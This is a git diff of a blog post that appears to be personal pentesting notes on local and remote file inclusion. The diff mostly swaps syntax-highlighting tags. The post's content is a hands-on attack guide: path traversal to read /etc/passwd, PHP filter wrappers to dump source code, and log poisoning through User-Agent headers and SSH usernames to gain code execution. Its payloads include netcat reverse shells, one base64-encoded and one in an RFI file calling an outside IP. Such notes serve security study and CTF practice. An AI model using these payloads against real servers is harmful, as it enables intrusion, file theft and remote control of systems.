--- a/_posts/notes/web/2022-04-23-lfi.md
+++ b/_posts/notes/web/2022-04-23-lfi.md
@@ -1,11 +1,10 @@
 ---
 layout: post
 title: 'Notes | LFI & RFI'
-date: 2022-04-23
 permalink: /notes/web/lfi-rfi/
 ---
 
-# [](#header-4)Local file inclusion
+# Local file inclusion
 **LFI** is the process to include files locate in the server through the exploiting of vulnerable inclusion.
 For example:
 {% highlight plain %}
@@ -13,7 +12,7 @@ http://localhost/example.php?file=../../../../../../../etc/passwd
 {% endhighlight %}
 
 With the terminal we can check easily:
-{% highlight plain %}
+{% highlight bash %}
 > curl -s "http://localhost/example.php?file=/etc/passwd"
 {% endhighlight %}
 ##### **-s**: no verbose
@@ -24,9 +23,9 @@ We can check some important files:
 - **/proc/net/fib_trie ->** check network interfaces (with *grep -i  "host local" -B 1* we can get local ip).
 - **/proc/net/tcp ->** check port. The last four digits from the second column (rem_address), if we add a **0x** in Python before we can get the port (its common to not get ports like 80 here).
 
-### [](#header-4) Directory Path Traversal
+###  Directory Path Traversal
 If the web is sanitaze with only one path allowed, we can move using **../**:
-{% highlight plain %}
+{% highlight bash %}
 > curl -s "http://localhost/example.php?file=../../../../../../../etc/passwd"
 {% endhighlight %}
 
@@ -37,19 +36,19 @@ Help to escape LFI sanitazer. For example:
 - **?file=file:///etc/passwd ->** get the file.
 - **?file=php:///filter/convert.base64-encode/resource=file.php ->** give all the content file (including comments) in base64 (useful to get the whole source code).
 
-### [](#header-4) Log Poisoning
+###  Log Poisoning
 Change logs in order to recreate a RCE.
 
 #### Reverse Shell
 We can execute code accesing **/proc/self/environ**. We can modify the header in burpsuite to add:
-{% highlight plain %}
+{% highlight php %}
 <?passthru('nc -e /bin/bash <ip> <port>');?>
 {% endhighlight %}
 To execute the reverse shell.
 
 #### Apache2
 In **/var/log/apache2/access.log** we can manipulate the user agent that the log is currently saving in the logs with curl. For example:
-{% highlight plain %}
+{% highlight bash %}
 > curl -s -H "User-Agent: <¿php system('whoami'); ?>" "http://localhost/example.php?file=/var/log/apache2/access.log"
 {% endhighlight %}
 Now we can execute code in the system.
@@ -60,25 +59,25 @@ Also, we can try to login (for example with ssh). **auth.log** will save the log
 Another example is the **/var/log/auth.log**. We can try to log in by ssh with and invalid user and see that all the trys are been saving in the log.
 If we log as a command, execute the log (loading with curl or in the web with LFI) we can execute the command and get a **reverse shell**:
 - First we encode the connection (with netcat).
-{% highlight plain %}
+{% highlight bash %}
 > echo 'nc -e /bin/bash 127.0.0.1:443' | base64; echo
   bmMgLWUgL2Jpbi9iYXNoIDEyNy4wLjAuMTo0NDMK
 {% endhighlight %}
 - Then we send this "user" to the log:
-{% highlight plain %}
+{% highlight bash %}
 > ssh '<¿php system("echo bmMgLWUgL2Jpbi9iYXNoIDEyNy4wLjAuMTo0NDMK | base64 -d | bash"); ?>'@127.0.0.1 
 {% endhighlight %}
 Then we will try to log in with any password. Now we just need to reload the log in the web, then the code is executed.
-{% highlight plain %}
+{% highlight bash %}
 > curl -s -H "User-Agent: <¿php system('whoami'); ?>" "http://localhost/example.php?file=/var/log/auth.log"
 {% endhighlight %}
 
 
-# [](#header-4)Remote File Inclusion (RFI)
+# Remote File Inclusion (RFI)
 Load files into the server.
 
 We can create a plain file (**.txt**) with a php content:
-{% highlight plain %}
+{% highlight php %}
 <?php
   passthru('nc -e /bin/sh 192.168.1.134 9000');
 ?>
